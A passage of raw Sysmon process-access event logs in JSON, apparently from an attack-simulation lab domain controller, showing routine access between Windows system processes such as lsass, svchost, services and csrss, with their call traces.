C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.756","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-001030530000}","TargetProcessId":"852","TargetImage":"C:\\Windows\\system32\\services.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":955,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.756\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.756","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":956,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.756\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.756","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":957,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.756\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001030530000}\r\nSourceProcessId: 852\r\nSourceThreadId: 936\r\nSourceImage: C:\\Windows\\system32\\services.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-00103D7A0100}\r\nTargetProcessId: 2372\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|C:\\Windows\\system32\\services.exe+12939|C:\\Windows\\system32\\services.exe+66f4|C:\\Windows\\system32\\services.exe+5154|C:\\Windows\\system32\\services.exe+d608|C:\\Windows\\system32\\services.exe+4c6c|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.756","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001030530000}","SourceProcessId":"852","SourceThreadId":"936","SourceImage":"C:\\Windows\\system32\\services.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-00103D7A0100}","TargetProcessId":"2372","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|C:\\Windows\\system32\\services.exe+12939|C:\\Windows\\system32\\services.exe+66f4|C:\\Windows\\system32\\services.exe+5154|C:\\Windows\\system32\\services.exe+d608|C:\\Windows\\system32\\services.exe+4c6c|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":958,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.756\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-00103D7A0100}\r\nTargetProcessId: 2372\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.756","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-00103D7A0100}","TargetProcessId":"2372","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":959,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.772\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001030530000}\r\nSourceProcessId: 852\r\nSourceThreadId: 940\r\nSourceImage: C:\\Windows\\system32\\services.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-00103D7A0100}\r\nTargetProcessId: 2372\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.772","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001030530000}","SourceProcessId":"852","SourceThreadId":"940","SourceImage":"C:\\Windows\\system32\\services.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-00103D7A0100}","TargetProcessId":"2372","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":960,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.772\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.772","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":961,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.772\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.772","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":962,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.772\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 